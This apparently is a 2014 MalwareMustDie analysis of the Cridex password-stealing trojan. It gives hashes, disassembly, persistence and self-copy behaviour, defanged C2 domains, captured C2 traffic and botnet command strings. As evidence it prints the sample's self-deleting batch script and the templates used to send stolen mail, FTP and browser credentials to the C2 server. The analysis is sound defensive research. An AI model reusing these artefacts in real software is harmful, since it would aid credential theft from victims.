MalwareMustDie

Trojan/PWS Win32/Cridex RETURNS

Jan 15th, 2014
  1. #------------------------------------------------------------------
  2. # MalwareMustDie | Analysis of Malware Trojan/PWS Win32/Cridex
  3. $ @unixfreaxjp Thursday January 16 2014 -- 02:55:48 +02:00
  4. # hash:
  5. MD5 ebb6072a86ad2496040d1bdd7d12a265
  6. SHA1 027d4d22faf25086040bc779360642c8faab2297
  7. # VT: https://www.virustotal.com/en/file/11643af5fef0079ce95fe2c292e1d8aecfb21dd1afc602f9ca28a8728550809b/analysis/
  8. # Network Traffic: https://www.mediafire.com/?v69oaie9edu2lo0
  9. # Additional- Decoded config by Mr. Kyle Yang (Fortinet) http://pastebin.com/766faxPH
  10. #------------------------------------------------------------------
  11.  
  12. // Binary is packed, CRC is wrong
  13. // Some quick reverse:
  14.  
  15. // ASM Traces:
  16. // Uses Microsoft's Enhanced Cryptographic Provider
  17.  
  18. 00407E80 lea eax, dword ptr [esp+04h]
  19. 00407E84 push eax
  20. 00407E85 push ecx
  21. 00407E86 push 00000000h
  22. 00407E88 push 00000001h
  23. 00407E8A push 00000000h
  24. 00407E8C push edx
  25. 00407E8D call dword ptr [00411044h] CryptDecrypt@ADVAPI32.DLL (Import, 6 Params)
  26. 00407E93 ret function end
  27.  
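  28. // Anti debug (suspected; GetProcessHeap often precedes a heap-flags debugger check, but the check itself is not shown in this trace)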
  29.  
  30. 00390426 call dword ptr [esi+08h] LdrLoadDll@NTDLL.DLL (Import, Hidden, 4 Params)
  31. 00404360 call dword ptr [00411138h] GetProcessHeap@KERNEL32.DLL (Import, 0 Params)
  32.  
  33. // Simple attempt at (suspected) VM detection, done by enumerating files:
  34.  
  35. 004050AF call dword ptr [004111DCh] PathCombineW@SHLWAPI.DLL (Import, 3 Params)
  36. 004050BB call dword ptr [004110D8h] FindFirstFileW@KERNEL32.DLL (Import, 2 Params)
  37. 00405147 call dword ptr [004111DCh] PathCombineW@SHLWAPI.DLL (Import, 3 Params)
  38. 00405161 call dword ptr [004111E0h] wnsprintfA@SHLWAPI.DLL (Import, Unknown Params)
  39. 00405196 call dword ptr [004110F0h] FindNextFileW@KERNEL32.DLL (Import, 2 Params)
  40. 004051A5 call dword ptr [004111C8h] FindClose@KERNEL32.DLL (Import, 1 Params)
  41.  
  42. // Attempt to self copy:
  43.  
  44. 004010C7 push 0042355Ch ASCII "C:\ghfwhe\pvLxggf\tqPUnrp\oaiQtp\MFhvyp.cia"
  45. 004010CC push 00423530h ASCII "C:\kblTpDb\wgiq\ckblqOQGx\piFnr\SMPgwYGn"
  46. 004010D1 call dword ptr [0041C02Ch] CopyFileA@KERNEL32.DLL (Import, Hidden, 3 Params)
  47. 004010D7 mov dword ptr [00423588h], eax
  48. 004010DC lea eax, dword ptr [004234D8h] UTF-16 "C:\utjDet\dvwtc\txfLv\hjuvaq" (Hidden)
  49. 004010E2 mov dword ptr [004235C8h], eax
  50. 004010E7 push dword ptr [004235C8h]
  51. 004010ED mov eax, dword ptr [004235A0h] 0x00000000
  52. 004010F2 mov dword ptr [ebp-34h], eax
  53. 004010F5 push dword ptr [ebp-34h]
  54. 004010F8 mov dword ptr [004235CCh], eax
  55. 004010FD push dword ptr [004235CCh]
  56. 00401103 push dword ptr [004235D0h]
  57. 00401109 mov dword ptr [ebp-38h], eax
  58. 0040110C push dword ptr [ebp-38h]
  59. 0040110F push dword ptr [004235D4h]
  60. 00401115 push dword ptr [004235D8h]
  61. 0040111B push 0042359Ch ASCII "NUL"
  62. 00401120 call dword ptr [0041C018h] CreateFileA@KERNEL32.DLL (Import, Hidden, 7 Params)
  63.  
  64. // Seeking further...
  65.  
  66. // Batch file used for the self copy (deletes the original sample, retrying until it is gone, then deletes itself):
  67. @echo off
  68. :R
  69. del /F /Q /A "C:\%sample%.exe"
  70. if exist "C:\%sample%.exe" goto R
  71. del /F /Q /A "%TEMP%\exp1.tmp.bat"
  72.  
  73. // Drops copies of itself using this file name format (the KB prefix presumably imitates Windows update naming):
  74. KB%08d.exe (i.e. 4168e4 -> "KB00161095.exe")
  75.  
  76. // Self duplication flooded the test bed:
  77.  
  78. sample.exe (PID: 2032 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  79. cmd.exe (PID: 1400 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp1.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  80. KB00161095.exe (PID: 1236 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  81. cmd.exe (PID: 1268 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp2.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  82. KB00082345.exe (PID: 1892 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  83. cmd.exe (PID: 488 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp3.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  84. KB00731095.exe (PID: 1832 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  85. cmd.exe (PID: 1776 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp4.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  86. KB01378595.exe (PID: 1168 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  87. cmd.exe (PID: 1528 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp5.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  88. KB00942141.exe (PID: 1320 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  89. cmd.exe (PID: 1772 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp6.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  90. KB00003595.exe (PID: 352 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  91. cmd.exe (PID: 900 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp7.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  92. KB00029540.exe (PID: 2000 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  93. cmd.exe (PID: 424 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp8.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  94. KB00854540.exe (PID: 220 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  95. cmd.exe (PID: 1060 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp9.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  96. KB01150790.exe (PID: 632 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  97. cmd.exe (PID: 2024 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expA.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  98. KB01044540.exe (PID: 1584 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  99. cmd.exe (PID: 2472 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expB.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  100. KB01193090.exe (PID: 2176 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  101. cmd.exe (PID: 2852 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expC.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  102. KB00740891.exe (PID: 3528 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  103. cmd.exe (PID: 2928 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expD.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  104. KB00668290.exe (PID: 2792 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  105. cmd.exe (PID: 3408 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expE.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  106. KB00616461.exe (PID: 868 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  107. cmd.exe (PID: 3340 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\expF.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  108. KB01448595.exe (PID: 3220 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  109. cmd.exe (PID: 3984 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp10.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  110. KB00933391.exe (PID: 3860 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  111. cmd.exe (PID: 596 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp11.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  112. KB00234437.exe (PID: 896 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  113. cmd.exe (PID: 2484 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp12.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  114. KB00688187.exe (PID: 2404 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  115. cmd.exe (PID: 3172 cmdline: C:\WINDOWS\system32\cmd.exe /c %TEMP%\exp13.tmp.bat MD5: 9B890F756D087991322464912FE68E75)
  116. KB00677040.exe (PID: 3180 MD5: EBB6072A86AD2496040D1BDD7D12A265)
  117.  
  118. // Autostart (persistence through the registry Run key; hive not shown here):
  119.  
  120. Software\Microsoft\Windows\CurrentVersion\Run
  121.  
  122. // Detect browsers (note: explorer.exe is the Windows shell, not a browser):
  123.  
  124. 4112d8 -> firefox.exe
  125. 4112f0 -> explorer.exe
  126. 4112c0 -> chrome.exe
  127.  
  128. // This is the cyber crime evidence part....
  129.  
  130. // CNC LIST:
  131.  
  132. h00p://portasible.ru
  133. h00p://ssshsecur.ru
  134. h00p://glebstark.ru
  135. h00p://kuchereneltd.ru
  136.  
  137. // CNC Request:
  138.  
  139. POST /PHVxGBAAAAA/yir2HD/99ocWCAAA/ HTTP/1.1
  140. Accept: */*
  141. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  142. Host: kuchereneltd.ru
  143. Content-Length: 338
  144. Connection: Keep-Alive
  145. Cache-Control: no-cache
  146.  
  147. 000000E0 0a .
  148. 000000E1 8d 6c 6d d8 7b 67 37 69 bd 95 d2 34 30 ca 6b 51 .lm.{g7i ...40.kQ
  149. 000000F1 9e a4 d2 11 b3 27 27 36 bb 12 c2 b8 82 29 35 f4 .....''6 .....)5.
  150. 00000101 c4 4e 50 5b 54 cb 89 7d b0 97 63 43 cc 00 81 8b .NP[T..} ..cC....
  151. 00000111 fa 46 0b 3b e7 29 0d ac 9e 75 12 f1 95 a6 70 dd .F.;.).. .u....p.
  152. 00000121 af a8 9d 09 7e fd 3a a6 92 c9 b7 96 78 d7 79 bf ....~.:. ....x.y.
  153. 00000131 25 90 51 dd 1b 30 41 df a2 53 83 56 f5 bd bf ea %.Q..0A. .S.V....
  154. 00000141 69 aa ef fa db d1 05 c9 ca f5 44 ae e2 df 58 d5 i....... ..D...X.
  155. 00000151 28 36 31 a4 57 f4 b0 a6 79 c8 f9 d9 42 18 ae 96 (61.W... y...B...
  156. 00000161 e9 e2 cf f7 c9 9f 50 f9 67 48 e7 49 8b 4b 90 5f ......P. gH.I.K._
  157. 00000171 fc eb 77 82 89 df 13 7a 09 f3 b1 96 69 26 cd ad ..w....z ....i&..
  158. 00000181 9b 64 b8 49 eb 3f 35 d7 a5 50 b9 e2 f0 c4 49 6c .d.I.?5. .P....Il
  159. 00000191 d3 97 85 76 76 88 2d 61 2d 2f e5 8d 5a 7a 4c 59 ...vv.-a -/..ZzLY
  160. 000001A1 90 68 5a ab 96 db 9c b3 41 51 ed f0 94 2b f8 8a .hZ..... AQ...+..
  161. 000001B1 8c c8 a0 b4 79 4c bc 5a 93 ee 5f 4f 1e 2f 5e aa ....yL.Z .._O./^.
  162. 000001C1 20 9b 8c 5c d4 f1 bb f0 b0 b1 d4 e6 6d 67 35 6f ..\.... ....mg5o
  163. 000001D1 3c 94 1c 6a 5e 1d fb ce 49 80 81 3a 77 4d 72 94 <..j^... I..:wMr.
  164. 000001E1 c6 15 6d 00 9d d9 fe 98 af 80 19 6d 1f c6 c6 0e ..m..... ...m....
  165. 000001F1 fe 5a 61 16 dc 1f ca b1 77 c3 2e 95 97 8e 3d f2 .Za..... w.....=.
  166. 00000201 91 24 df 99 e4 cb 13 35 76 20 4d cd 21 91 13 42 .$.....5 v M.!..B
  167. 00000211 67 ac 49 85 cb 5e 3e b1 8d c0 e4 13 6a dc ad 61 g.I..^>. ....j..a
  168. 00000221 7f 68 0d c4 e4 27 85 00 89 58 dc 57 b9 6d 4c 98 .h...'.. .X.W.mL.
  169. 00000231 4d 93 M.
  170.  
  171.  
  172. // HTTP POST SENT FORMAT:
  173.  
  174. // header strings stored in the binary (usable for IOC or YARA)
  175.  
  176. Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  177. HTTP/1.1 200 OK Connection: close
  178. application/x-www-form-urlencoded
  179. multipart/form-data
  180. Content-Disposition: attachment; filename=%S
  181.  
  182. // CNC/Botnet Related commands:
  183.  
  184. formgrabber
  185. commands
  186. allow
  187. deny
  188. redirect
  189. https
  190. bconnect
  191. type
  192. settings
  193. actions
  194. httpinjects
  195. pattern
  196. process
  197. send
  198. exec
  199. socket
  200. select
  201. httpshots
  202. closesocket
  203.  
  204.  
  205. // Two HTTP protocol versions traced in the connectivity:
  206.  
  207. HTTP/1.1
  208. HTTP/1.0
  209.  
  210. // CREDENTIAL STEALER TEMPLATE
  211. // templates used to send credentials (shown without credential values, before encryption):
  212.  
  213. 4118b0 -> <message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u"> // Operating system
  214. <header>
  215. <unique>%%.%us</unique>
  216. <version>%%u</version>
  217. <system>%%u</system>
  218. <network>%%u</network>
  219. </header><data>
  220. 411a3c -> </data></message>
  221.  
  222. 411730: <pop3 time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server> //pop3 mail
  223. <user><![CDATA[%%.%us]]></user><pass><![CDATA[
  224. 4117a4 -> ]]></pass></pop3>
  225.  
  226. 411850: <ff time="%u"><data><![CDATA[ // firefox
  227. 411870: ]]></data></ff>
  228.  
  229. 411880: <mm time="%u"><data><![CDATA[ // mm? macromedia?
  230.  
  231. 4118a0 -> ]]></data></mm>
  232.  
  233. 4117d0: <cert time="%u"><pass><![CDATA[ // certificate/password
  234. 4117f0: ]]></pass><data><![CDATA[
  235. 41180c -> ]]></data></cert>
  236.  
  237. 411648: <httpshot time="%%%uu"><url><![CDATA[%%.%us]]></url><data><![CDATA[ //links
  238. 41168c -> ]]></data></httpshot>
  239.  
  240. 4116a8: <ftp time="%%%uu"><server> // FTP credential sender format:
  241. <![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
  242. <user><![CDATA[%%.%us]]></user><pass><![CDATA[
  243. 41171c: ]]></pass></ftp>
  244.  
  245. 4115c8: <http time="%%%uu"> // links
  246. <url><![CDATA[%%.%us]]></url>
  247. <useragent><![CDATA[%%.%us]]></useragent><data><![CDATA[
  248. 411634 -> ]]></data></http>
  249.  
  250. 411820: <ie time="%u"><data><![CDATA[
  251. 411840 -> ]]></data></ie>
  252.  
  253. // CNC Response
  254.  
  255. HTTP/1.1 200 OK
  256. Server: nginx/1.2.1
  257. Date: Wed, 15 Jan 2014 23:09:22 GMT
  258. Content-Type: text/html
  259. Transfer-Encoding: chunked
  260. Connection: keep-alive
  261. X-Powered-By: PHP/5.4.4-14+deb7u7
  262. Vary: Accept-Encoding
  263.  
  264. 000000D0 0d 0a 0d 0a 62 36 38 37 0d 0a 1e 06 31 bd 7f b1 ....b687 ....1...
  265. 000000E0 66 f9 5e c2 33 44 02 05 c3 71 7c 6e ff 4d 12 93 f.^.3D.. .q|n.M..
  266. 000000F0 a7 a6 28 ae 99 db dc d0 77 fc e6 66 c2 f0 15 5d ..(..... w..f...]
  267. 00000100 d9 e2 5f ab 92 11 2a 51 4d ca f4 17 e8 b9 a2 96 .._...*Q M.......
  268. 00000110 d9 1e 40 1f 87 00 76 f2 d8 e9 14 4c 1f 1f 30 97 ..@...v. ...L..0.
  269. 00000120 68 52 14 af 87 63 19 80 06 8e 04 77 6e 48 c9 ca hR...c.. ...wnH..
  270. 00000130 5f b9 db 8a 40 b7 74 e0 93 4a 0a 9e 55 b8 14 b8 _...@.t. .J..U...
  271. 00000140 5c ba ce c8 80 6b fb d3 c2 66 72 ec 65 aa bf f6 \....k.. .fr.e...
  272. 00000150 fe 3c 42 74 8c e7 27 b1 39 a9 da 39 a3 ee 5e 6b .<Bt..'. 9..9..^k
  273. 00000160 4b 0d 32 55 bf ef 95 60 18 90 af d8 07 09 89 c2 K.2U...` ........
  274. 00000170 17 6a 11 f7 a2 cd 75 26 cd ad b0 65 b7 5d f0 22 .j....u& ...e.]."
  275. 00000180 7f 94 f6 4a e1 b1 97 d1 1d 28 da d0 80 64 66 9e ...J.... .(...df.
  276.  
  277. [...]
  278.  
  279. 0000B6B8 6d 13 6c 3f f1 15 1c f5 d2 75 f7 3c ca 66 f9 18 m.l?.... .u.<.f..
  280. 0000B6C8 c9 80 a0 7f 4b 07 01 e7 3b b7 d8 0f a0 ce 3a 1e ....K... ;.....:.
  281. 0000B6D8 5c 58 9f 2d e8 98 fe 23 b1 06 ab 96 94 9c 84 1e \X.-...# ........
  282. 0000B6E8 09 e5 10 11 28 05 61 c8 a4 96 22 b8 4f 10 5a 57 ....(.a. ..".O.ZW
  283. 0000B6F8 c8 2e 23 2b 91 ad 16 fe 92 9c 5d e4 57 0c b6 bb ..#+.... ..].W...
  284. 0000B708 0a 47 bf 77 30 c2 01 e7 c4 7f b1 a0 5c 8c 70 4b .G.w0... ....\.pK
  285. 0000B718 6f e0 72 8e 2a 40 8a 10 c9 f0 f0 78 cf 09 c3 8b o.r.*@.. ...x....
  286. 0000B728 d2 a0 20 78 18 92 46 67 eb 86 d8 03 9c 30 96 da .. x..Fg .....0..
  287. 0000B738 46 05 ad 52 65 b6 d8 41 d3 52 5a d5 21 f9 64 54 F..Re..A .RZ.!.dT
  288. 0000B748 08 7d b1 83 73 8a ee a1 77 f8 fb f0 2a 82 cf 94 .}..s... w...*...
  289. 0000B758 df c2 94 7c 87 d6 6e 18 a4 0d 0a 30 0d 0a 0d 0a ...|..n. ...0....
  290.  
  291. // One Domain used as CNC is CURRENTLY ALIVE!! (as of the check dated below)
  292.  
  293. FYI, one of the domains is still active and serving malware:
  294.  
  295. $ date
  296. Thu Jan 16 11:09:48 JST 2014
  297.  
  298. $ dig kuchereneltd.ru
  299.  
  300. ; <<>> DiG 9.2.5 <<>> kuchereneltd.ru
  301. ;; global options: printcmd
  302. ;; Got answer:
  303. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17040
  304. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 10
  305.  
  306. ;; QUESTION SECTION:
  307. ;kuchereneltd.ru. IN A
  308.  
  309. ;; ANSWER SECTION:
  310. kuchereneltd.ru. 3600 IN A 94.76.240.56
  311.  
  312. ;; AUTHORITY SECTION:
  313. kuchereneltd.ru. 3600 IN NS ns2.reg.ru.
  314. kuchereneltd.ru. 3600 IN NS ns1.reg.ru.
  315.  
  316. ;; ADDITIONAL SECTION:
  317. ns2.reg.ru. 2518 IN A 31.31.205.74
  318. ns2.reg.ru. 2518 IN A 88.212.207.122
  319. ns2.reg.ru. 2518 IN A 198.100.149.22
  320. ns2.reg.ru. 2518 IN A 31.31.205.56
  321. ns1.reg.ru. 3046 IN A 31.31.205.73
  322. ns1.reg.ru. 3046 IN A 31.31.204.25
  323. ns1.reg.ru. 3046 IN A 31.31.204.37
  324. ns1.reg.ru. 3046 IN A 31.31.204.52
  325. ns1.reg.ru. 3046 IN A 31.31.205.39
  326. ns1.reg.ru. 3046 IN A 31.31.205.55
  327.  
  328. ;; Query time: 275 msec
  329. ;; SERVER: 202.238.95.24#53(202.238.95.24)
  330. ;; WHEN: Thu Jan 16 11:09:13 2014
  331. ;; MSG SIZE rcvd: 249
  332.  
  333. domain: KUCHERENELTD.RU
  334. nserver: ns1.reg.ru.
  335. nserver: ns2.reg.ru.
  336. state: REGISTERED, DELEGATED, UNVERIFIED
  337. person: Private Person
  338. registrar: REGRU-REG-RIPN
  339. admin-contact: http://www.reg.ru/whois/admin_contact
  340. created: 2014.01.06
  341. paid-till: 2015.01.06
  342. free-date: 2015.02.06
  343. source: TCI
  344. Last updated on 2014.01.16 06:06:36 MSK
  345.  
  346. $ myget -d kuchereneltd.ru
  347.  
  348. GET / HTTP/1.1
  349. Accept: */*
  350. Host: kuchereneltd.ru
  351.  
  352. Server: nginx/1.2.1
  353. Date: Thu, 16 Jan 2014 02:26:47 GMT
  354. Content-Type: text/html
  355. Transfer-Encoding: chunked
  356. Connection: keep-alive
  357.  
  358. ---
  359. #MalwareMustDie!
  360. " Thou shalt not steal.."